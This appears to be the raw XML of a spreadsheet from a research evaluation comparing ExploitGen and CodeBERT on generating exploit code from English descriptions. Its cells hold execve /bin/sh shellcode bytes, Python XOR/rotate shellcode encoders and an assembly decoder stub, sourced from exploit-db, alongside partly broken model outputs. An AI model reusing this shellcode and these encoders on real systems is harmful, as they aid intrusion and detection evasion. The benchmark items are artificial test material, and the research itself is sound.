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Latex项目\JSS-Exploit代码生成\代码\ExploitGen\result\Human\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{68ABBE48-F702-4B08-98CE-9A283E9E2382}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12576" tabRatio="685" firstSheet="12" activeTab="19" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="ShellCode_01" sheetId="1" r:id="rId1"/>
    <sheet name="ShellCode_02" sheetId="2" r:id="rId2"/>
    <sheet name="ShellCode_03" sheetId="3" r:id="rId3"/>
    <sheet name="ShellCode_04" sheetId="4" r:id="rId4"/>
    <sheet name="ShellCode_05" sheetId="5" r:id="rId5"/>
    <sheet name="ShellCode_06" sheetId="6" r:id="rId6"/>
    <sheet name="ShellCode_07" sheetId="7" r:id="rId7"/>
    <sheet name="ShellCode_08" sheetId="8" r:id="rId8"/>
    <sheet name="ShellCode_09" sheetId="9" r:id="rId9"/>
    <sheet name="ShellCode_10" sheetId="10" r:id="rId10"/>
    <sheet name="ShellCode_11" sheetId="11" r:id="rId11"/>
    <sheet name="ShellCode_12" sheetId="12" r:id="rId12"/>
    <sheet name="ShellCode_13" sheetId="13" r:id="rId13"/>
    <sheet name="ShellCode_14" sheetId="14" r:id="rId14"/>
    <sheet name="ShellCode_15" sheetId="15" r:id="rId15"/>
    <sheet name="ShellCode_16" sheetId="16" r:id="rId16"/>
    <sheet name="ShellCode_17" sheetId="17" r:id="rId17"/>
    <sheet name="ShellCode_18" sheetId="18" r:id="rId18"/>
    <sheet name="ShellCode_19" sheetId="19" r:id="rId19"/>
    <sheet name="ShellCode_20"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7" i="19" l="1"/>
  <c r="D57" i="19"/>
  <c r="H71" i="16"/>
  <c r="E111" i="20"/>
  <c r="F111" i="20"/>
  <c r="G111" i="20"/>
  <c r="H111" i="20"/>
  <c r="D111" i="20"/>
  <c r="E86" i="19"/>
  <c r="F86" i="19"/>
  <c r="G86" i="19"/>
  <c r="H86" i="19"/>
  <c r="D86" i="19"/>
  <c r="E38" i="18"/>
  <c r="F38" i="18"/>
  <c r="G38" i="18"/>
  <c r="H38" i="18"/>
  <c r="D38" i="18"/>
  <c r="E75" i="17"/>
  <c r="F75" i="17"/>
  <c r="G75" i="17"/>
  <c r="H75" i="17"/>
  <c r="D75" i="17"/>
  <c r="E71" i="16"/>
  <c r="F71" i="16"/>
  <c r="G71" i="16"/>
  <c r="D71" i="16"/>
  <c r="E106" i="15"/>
  <c r="F106" i="15"/>
  <c r="G106" i="15"/>
  <c r="H106" i="15"/>
  <c r="D106" i="15"/>
  <c r="E52" i="14"/>
  <c r="F52" i="14"/>
  <c r="G52" i="14"/>
  <c r="H52" i="14"/>
  <c r="D52" i="14"/>
  <c r="E113" i="13"/>
  <c r="F113" i="13"/>
  <c r="G113" i="13"/>
  <c r="H113" i="13"/>
  <c r="D113" i="13"/>
  <c r="E64" i="12"/>
  <c r="F64" i="12"/>
  <c r="G64" i="12"/>
  <c r="H64" i="12"/>
  <c r="D64" i="12"/>
  <c r="E56" i="11"/>
  <c r="F56" i="11"/>
  <c r="G56" i="11"/>
  <c r="H56" i="11"/>
  <c r="D56" i="11"/>
  <c r="E44" i="10"/>
  <c r="F44" i="10"/>
  <c r="G44" i="10"/>
  <c r="H44" i="10"/>
  <c r="D44" i="10"/>
  <c r="E73" i="9"/>
  <c r="F73" i="9"/>
  <c r="G73" i="9"/>
  <c r="H73" i="9"/>
  <c r="D73" i="9"/>
  <c r="E55" i="8"/>
  <c r="F55" i="8"/>
  <c r="G55" i="8"/>
  <c r="H55" i="8"/>
  <c r="D55" i="8"/>
  <c r="E62" i="7"/>
  <c r="F62" i="7"/>
  <c r="G62" i="7"/>
  <c r="H62" i="7"/>
  <c r="D62" i="7"/>
  <c r="E38" i="6"/>
  <c r="F38" i="6"/>
  <c r="G38" i="6"/>
  <c r="H38" i="6"/>
  <c r="D38" i="6"/>
  <c r="E38" i="5"/>
  <c r="F38" i="5"/>
  <c r="G38" i="5"/>
  <c r="H38" i="5"/>
  <c r="D38" i="5"/>
  <c r="E46" i="4"/>
  <c r="F46" i="4"/>
  <c r="G46" i="4"/>
  <c r="H46" i="4"/>
  <c r="D46" i="4"/>
  <c r="E62" i="3"/>
  <c r="F62" i="3"/>
  <c r="G62" i="3"/>
  <c r="H62" i="3"/>
  <c r="D62" i="3"/>
  <c r="E66" i="2"/>
  <c r="F66" i="2"/>
  <c r="G66" i="2"/>
  <c r="H66" i="2"/>
  <c r="D66" i="2"/>
  <c r="E61" i="20"/>
  <c r="F61" i="20"/>
  <c r="G61" i="20"/>
  <c r="H61" i="20"/>
  <c r="D61" i="20"/>
  <c r="F57" i="19"/>
  <c r="G57" i="19"/>
  <c r="H57" i="19"/>
  <c r="E16" i="18"/>
  <c r="F16" i="18"/>
  <c r="G16" i="18"/>
  <c r="H16" i="18"/>
  <c r="D16" i="18"/>
  <c r="E37" i="17"/>
  <c r="F37" i="17"/>
  <c r="G37" i="17"/>
  <c r="H37" i="17"/>
  <c r="D37" i="17"/>
  <c r="E47" i="16"/>
  <c r="F47" i="16"/>
  <c r="G47" i="16"/>
  <c r="H47" i="16"/>
  <c r="D47" i="16"/>
  <c r="E59" i="15"/>
  <c r="F59" i="15"/>
  <c r="G59" i="15"/>
  <c r="H59" i="15"/>
  <c r="D59" i="15"/>
  <c r="E28" i="14"/>
  <c r="F28" i="14"/>
  <c r="G28" i="14"/>
  <c r="H28" i="14"/>
  <c r="D28" i="14"/>
  <c r="E81" i="13"/>
  <c r="F81" i="13"/>
  <c r="G81" i="13"/>
  <c r="H81" i="13"/>
  <c r="D81" i="13"/>
  <c r="E13" i="12"/>
  <c r="F13" i="12"/>
  <c r="G13" i="12"/>
  <c r="H13" i="12"/>
  <c r="D13" i="12"/>
  <c r="E22" i="11"/>
  <c r="F22" i="11"/>
  <c r="G22" i="11"/>
  <c r="H22" i="11"/>
  <c r="D22" i="11"/>
  <c r="E20" i="10"/>
  <c r="F20" i="10"/>
  <c r="G20" i="10"/>
  <c r="H20" i="10"/>
  <c r="D20" i="10"/>
  <c r="E44" i="9"/>
  <c r="F44" i="9"/>
  <c r="G44" i="9"/>
  <c r="H44" i="9"/>
  <c r="D44" i="9"/>
  <c r="E26" i="8"/>
  <c r="F26" i="8"/>
  <c r="G26" i="8"/>
  <c r="H26" i="8"/>
  <c r="D26" i="8"/>
  <c r="E25" i="7"/>
  <c r="G25" i="7"/>
  <c r="H25" i="7"/>
  <c r="D25" i="7"/>
  <c r="E17" i="6"/>
  <c r="F17" i="6"/>
  <c r="G17" i="6"/>
  <c r="H17" i="6"/>
  <c r="D17" i="6"/>
  <c r="E17" i="5"/>
  <c r="F17" i="5"/>
  <c r="G17" i="5"/>
  <c r="H17" i="5"/>
  <c r="D17" i="5"/>
  <c r="E19" i="4"/>
  <c r="F19" i="4"/>
  <c r="G19" i="4"/>
  <c r="H19" i="4"/>
  <c r="D19" i="4"/>
  <c r="E30" i="3"/>
  <c r="F30" i="3"/>
  <c r="G30" i="3"/>
  <c r="H30" i="3"/>
  <c r="D30" i="3"/>
  <c r="E29" i="2"/>
  <c r="F29" i="2"/>
  <c r="G29" i="2"/>
  <c r="H29" i="2"/>
  <c r="D29" i="2"/>
  <c r="E41" i="1"/>
  <c r="D41" i="1"/>
  <c r="H41" i="1"/>
  <c r="G41" i="1"/>
  <c r="H19" i="1" l="1"/>
  <c r="G19" i="1"/>
  <c r="E19" i="1"/>
  <c r="D19" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4421" uniqueCount="1936">
  <si>
    <t>Python Encoders</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Reference Code</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CodeBERT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ExploitGen</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Syntactic</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Semantic</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shellcode is a string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>encoded is a string ""</t>
  </si>
  <si>
    <t>encoded2 is a string ""</t>
  </si>
  <si>
    <t>rot is an integer 8</t>
  </si>
  <si>
    <t>print 'Encoded shellcode' to the standard output</t>
  </si>
  <si>
    <t>loop through shellcode converted into a bytearray</t>
  </si>
  <si>
    <t>y is not x</t>
  </si>
  <si>
    <t>h is the sum of y and rot modulo 256</t>
  </si>
  <si>
    <t xml:space="preserve">append string '\\x' to encoded </t>
  </si>
  <si>
    <t>append to the string encoded the hexadecimal conversion of the and operation between h and 0xff</t>
  </si>
  <si>
    <t>append string '0x' to encoded2</t>
  </si>
  <si>
    <t>Convert the value of h bitwise and 0xff to a hexadecimal, concatenate the result with the string ',' and then add it to the variable encoded2</t>
  </si>
  <si>
    <t>print encoded to the standard output</t>
  </si>
  <si>
    <t>print encoded2 to the standard output</t>
  </si>
  <si>
    <t>print 'Len: %d' to the standard output, with '%d' replaced with len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'</t>
  </si>
  <si>
    <t>shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shellcode = ( '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' )</t>
  </si>
  <si>
    <t>shellcode = ( '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded = ''</t>
  </si>
  <si>
    <t>encoded2 = ''</t>
  </si>
  <si>
    <t>rot = 8</t>
  </si>
  <si>
    <t>for i in bytearray ( shellcode ) :</t>
  </si>
  <si>
    <t>for b in bytearray ( shellcode ) :</t>
  </si>
  <si>
    <t>for b in bytearray ( shellcode ) :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NONE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>y = ~ x</t>
  </si>
  <si>
    <t>y = not x</t>
  </si>
  <si>
    <t>h = ( y + rot ) % 256</t>
  </si>
  <si>
    <t>encoded += '\\x'</t>
  </si>
  <si>
    <t>encoded += '\n'</t>
  </si>
  <si>
    <t>encoded += '\n'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded += '%02x' % ( h &amp; 0xff )</t>
  </si>
  <si>
    <t>encoded2 += '0x'</t>
  </si>
  <si>
    <t>ALL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % ( h &amp; 0xff )</t>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % ( h &amp; 0xff )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Assembly Decoders</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>global _start</t>
  </si>
  <si>
    <t>section text</t>
  </si>
  <si>
    <t>define the _start label and jump short to the call_shellcode</t>
  </si>
  <si>
    <t>define the decoder function and store the encoded shellcode pointer in the esi register</t>
  </si>
  <si>
    <t>zero out the ecx register and move 25 in the lower 8 bits of the register</t>
  </si>
  <si>
    <t>define the decode label</t>
  </si>
  <si>
    <t>subtract 8 from the byte in esi and then negate the result</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>point to the next byte in esi</t>
  </si>
  <si>
    <t>decrement the counter and jump to the decode label if it is not zero else jump short to the encodedshellcode label</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>define the call_shellcode label and call the decoder function</t>
  </si>
  <si>
    <t>define the array of bytes encodedshellcode and initialize it to 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>global _start:</t>
  </si>
  <si>
    <t>section . text</t>
  </si>
  <si>
    <t xml:space="preserve"> jmp short call_shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>_start:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>decoder:</t>
  </si>
  <si>
    <t>decoder:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pop esi</t>
  </si>
  <si>
    <t>xor ecx, ecx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl, 25</t>
  </si>
  <si>
    <t>decode:</t>
  </si>
  <si>
    <t>sub byte [esi], 8</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>not byte [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>inc esi</t>
  </si>
  <si>
    <t>loop decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp short encodedshellcode</t>
  </si>
  <si>
    <t>jmp short decode</t>
  </si>
  <si>
    <t>call_shellcode:</t>
  </si>
  <si>
    <t>call decoder</t>
  </si>
  <si>
    <t>call var</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call [decoder]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>y = x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shellcode is a string "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>end is a string "\\xaa"</t>
  </si>
  <si>
    <t>if x is less than 128</t>
  </si>
  <si>
    <t>x is x xor 0xDD</t>
  </si>
  <si>
    <t>append string '\\x' to encoded</t>
  </si>
  <si>
    <t>append the value x converted in hex to the string encoded</t>
  </si>
  <si>
    <t>else</t>
  </si>
  <si>
    <t>x is not x</t>
  </si>
  <si>
    <t>append end to encoded</t>
  </si>
  <si>
    <t>shellcode is a string "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>print 'Encoded shellcode ...' to the standard output</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loop through shellcode converted into a bytearray</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>append string '\\xbb' to encoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>append string '\\x' to encoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>append the value x converted in hex to the string encoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>append string '\\xcc' to encoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>append to the string encoded the hexadecimal conversion of the and operation between x and 0xff</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>convert to hexadecimal a random integer between 1 and 169 and append it to the string encoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>print "Shellcode Len: %d", with %d replaced with len(bytearray(shellcode))</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>print "Encoded Shellcode Len: %d" to the standard output, with %d replaced with len(bytearray(encoded))</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>print encoded to the standard output</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>convert encoded to string and replace all occurrences of "\\x" with ",0x" in it</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>substitute elements of nasm from the index 1 to end for nasm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>print "NASM version:" to the standard output</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>print nasm to the standard output</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>import random</t>
  </si>
  <si>
    <t>import module random</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>import random</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shellcode = ( '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' )</t>
  </si>
  <si>
    <t>end = '\\xaa'</t>
  </si>
  <si>
    <t>if x &lt; 128 :</t>
  </si>
  <si>
    <t>x = x ^ 0xDD</t>
  </si>
  <si>
    <t>x = x ^ 221</t>
  </si>
  <si>
    <t>encoded += '\\xbb'</t>
  </si>
  <si>
    <t>encoded += '%02x' % x</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % x</t>
  </si>
  <si>
    <t>else:</t>
  </si>
  <si>
    <t>elif:</t>
  </si>
  <si>
    <t>elifel:</t>
  </si>
  <si>
    <t>x = ~ x</t>
  </si>
  <si>
    <t>encoded += '\\xcc'</t>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/47564</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/47461</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded += '%02x' % ( x &amp; 0xff )</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % random . randint ( 1 , 169 )</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % random . randint ( 1 , 151 )</t>
  </si>
  <si>
    <t>encoded = encoded + end</t>
  </si>
  <si>
    <t>encoded += end</t>
  </si>
  <si>
    <t>nasm = str ( encoded ) . replace ( '\\x' , ',0x' )</t>
  </si>
  <si>
    <t>nasm = nasm [ 1 : ]</t>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/46994</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define shellcode as a tuple and add the string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>encoded is string ""</t>
  </si>
  <si>
    <t>encodedP2 is string ""</t>
  </si>
  <si>
    <t>encoded2 is string ""</t>
  </si>
  <si>
    <t>count is integer 1</t>
  </si>
  <si>
    <t>print string 'Encoded shellcode ...' to the standard output</t>
  </si>
  <si>
    <t>increment x by 1</t>
  </si>
  <si>
    <t>if count modulo 2 is different from zero</t>
  </si>
  <si>
    <t>append string '\\x' to encodedP2</t>
  </si>
  <si>
    <t>convert the value x to hex and append it to the string encodedP2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Convert the value of x to a hexadecimal then add it to the variable encoded2 followed by the string ', '</t>
  </si>
  <si>
    <t>append string '0x' to encoded2P2</t>
  </si>
  <si>
    <t>convert the value x to hex, concatenate the result with ',' and append it to the string encoded2P2</t>
  </si>
  <si>
    <t>increment count by 1</t>
  </si>
  <si>
    <t>append encodedP2 to encoded, print it to the standard output</t>
  </si>
  <si>
    <t>append encoded2P2 to encoded2, print it to the standard output</t>
  </si>
  <si>
    <t>print 'Replace number to: %d' to the standard output, with '%d' replaced with count divided by 2</t>
  </si>
  <si>
    <t>def shellcode('1ÀPh//shh/binãPâSá°_x000B_Í' + 1):</t>
  </si>
  <si>
    <t>encodedP2 = ''</t>
  </si>
  <si>
    <t>encoded2P2 = ''</t>
  </si>
  <si>
    <t>count = 1</t>
  </si>
  <si>
    <t>encoded2P2 is string ""</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> x += 1</t>
  </si>
  <si>
    <t>if count % 2 != 0 :</t>
  </si>
  <si>
    <t>encodedP2 += '\\x'</t>
  </si>
  <si>
    <t>encodedP2 += '%02x' % x</t>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % x</t>
  </si>
  <si>
    <t>encoded2P2 += '0x'</t>
  </si>
  <si>
    <t>encoded2P2 += '%02x, ' % x</t>
  </si>
  <si>
    <t>count += 1</t>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/46519</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>print 'Encoded shellcode...' to the standard output</t>
  </si>
  <si>
    <t>append string '\\x' followed by the conversion in hex of 0xAA to the string encoded</t>
  </si>
  <si>
    <t>concatenate the string '0x' with the hexadecimal conversion of 0xAA and append the result to the string encoded2</t>
  </si>
  <si>
    <t>append string "\n" to encoded, print it to the standard output</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % 0xAA</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % '\\x'</t>
  </si>
  <si>
    <t>'encoded2 += '%02x, ' % x'</t>
  </si>
  <si>
    <t>encoded2 += '0x%02x, ' % 0xAA</t>
  </si>
  <si>
    <t>print string 'Encoded shellcode...' to the standard output</t>
  </si>
  <si>
    <t>y is x xor 0xAA</t>
  </si>
  <si>
    <t>y = x ^ 0xAA</t>
  </si>
  <si>
    <t>append the value y converted in hex to the string encoded</t>
  </si>
  <si>
    <t>encoded += '%02x' % y</t>
  </si>
  <si>
    <t>Convert the variable y to a hexadecimal. Concatenate the result with the string ',' and add the result to the variable encoded2</t>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % y</t>
  </si>
  <si>
    <t>define shellcode as a tuple and add the string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>for i in bytearray ( shellcode ) :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/46499</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>y = x ^ 170</t>
  </si>
  <si>
    <t>'encoded2 += '%02x, ' % y'</t>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/46493</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>perform the and operation between y and 0xff, then convert the result in hexadecimal and append it to the string encoded</t>
  </si>
  <si>
    <t>Convert the value of y bitwise and 0xff to a hexadecimal then add it to the variable encoded2 followed by the string ','</t>
  </si>
  <si>
    <t>encoded += '%02x' % ( y &amp; 0xff )</t>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % ( y &amp; 0xff )</t>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/45529</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>import module sys</t>
  </si>
  <si>
    <t>import sys</t>
  </si>
  <si>
    <t>if the length of sys.argv is different from 3</t>
  </si>
  <si>
    <t>if len ( sys . argv ) != 3 :</t>
  </si>
  <si>
    <t>print string "Usage : python encode.py &lt;SHIFT number&gt; &lt;XOR number&gt;" to the standard output</t>
  </si>
  <si>
    <t>call the exit function from sys with 0 as argument</t>
  </si>
  <si>
    <t>sys . exit ( 0 )</t>
  </si>
  <si>
    <t>shift is the first element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>shift = int ( sys . argv [ 1 ] )</t>
  </si>
  <si>
    <t>xor is the second element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>xor = int ( sys . argv [ 2 ] )</t>
  </si>
  <si>
    <t>encoded_shellcode is a string ""</t>
  </si>
  <si>
    <t>encoded_shellcode = ''</t>
  </si>
  <si>
    <t>append '0x' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>encoded_shellcode += '0x'</t>
  </si>
  <si>
    <t>convert shift to hexadecimal and append it followed by ', ' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % shift</t>
  </si>
  <si>
    <t>convert xor in hexadecimal and append it followed by ', ' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % xor</t>
  </si>
  <si>
    <t>new is not i and 0xff</t>
  </si>
  <si>
    <t>new = ~ i &amp; 0xff</t>
  </si>
  <si>
    <t>new is new shifted left by shift</t>
  </si>
  <si>
    <t>new = new &lt;&lt; shift</t>
  </si>
  <si>
    <t>new is new xor xor</t>
  </si>
  <si>
    <t>new = new ^ xor</t>
  </si>
  <si>
    <t>append the hexadecimal conversion of new followed by ', ' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % new</t>
  </si>
  <si>
    <t>print encoded_shellcode to the standard output</t>
  </si>
  <si>
    <t>if len ( sys . argv ) != 3 :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sys . exit ( 0 )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sys . exit ( sys )</t>
  </si>
  <si>
    <t>pop = int ( sys . argv [ 0 ] )</t>
  </si>
  <si>
    <t>x = int ( sys . argv [ 1 ] )</t>
  </si>
  <si>
    <t>encoded_shellcode += '\\x'</t>
  </si>
  <si>
    <t>push = int ( sys . argv [ 1 ] )</t>
  </si>
  <si>
    <t>xor = int ( sys . argv [ 1 ] )</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % x</t>
  </si>
  <si>
    <t>URL: https://www.exploit-db.com/shellcodes/43890</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>W is a string '\033[0m'</t>
  </si>
  <si>
    <t>W = '\033[0m'</t>
  </si>
  <si>
    <t>P is a string '\033[35m'</t>
  </si>
  <si>
    <t>P = '\033[35m'</t>
  </si>
  <si>
    <t>Y is a '\033[33m'</t>
  </si>
  <si>
    <t>Y = '\033[33m'</t>
  </si>
  <si>
    <t>ROT is the first element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>ROT = int ( sys . argv [ 1 ] )</t>
  </si>
  <si>
    <t>nbits is the second element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>nbits = int ( sys . argv [ 2 ] )</t>
  </si>
  <si>
    <t>XOR is the third element of sys.argv converted to integer</t>
  </si>
  <si>
    <t>XOR = int ( sys . argv [ 3 ] )</t>
  </si>
  <si>
    <t>shellcode is a string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>shellcode = ( '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80' )</t>
  </si>
  <si>
    <t>XOR_HEX is XOR converted to hexadecimal</t>
  </si>
  <si>
    <t>XOR_HEX = hex ( XOR )</t>
  </si>
  <si>
    <t>original_shellcode is a string ""</t>
  </si>
  <si>
    <t>original_shellcode = ''</t>
  </si>
  <si>
    <t>append string '0x' to original_shellcode</t>
  </si>
  <si>
    <t>original_shellcode += '0x'</t>
  </si>
  <si>
    <t>convert the value x in hexadecimal and append it to the string original_shellcode followed by ','</t>
  </si>
  <si>
    <t>original_shellcode += '%02x, ' % x</t>
  </si>
  <si>
    <t>byte is the sum of y and ROT modulo 256</t>
  </si>
  <si>
    <t>byte = ( y + ROT ) % 256</t>
  </si>
  <si>
    <t>byte is byte shifted left by nbits</t>
  </si>
  <si>
    <t>byte = byte &lt;&lt; nbits</t>
  </si>
  <si>
    <t>byte is byte xor XOR</t>
  </si>
  <si>
    <t>byte = byte ^ XOR</t>
  </si>
  <si>
    <t>append the hexadecimal conversion of byte followed by ', ' to the string encoded_shellcode</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % byte</t>
  </si>
  <si>
    <t>append strings "Original shellcode: ", P, original_shellcode and W to Y, print it to the standard output</t>
  </si>
  <si>
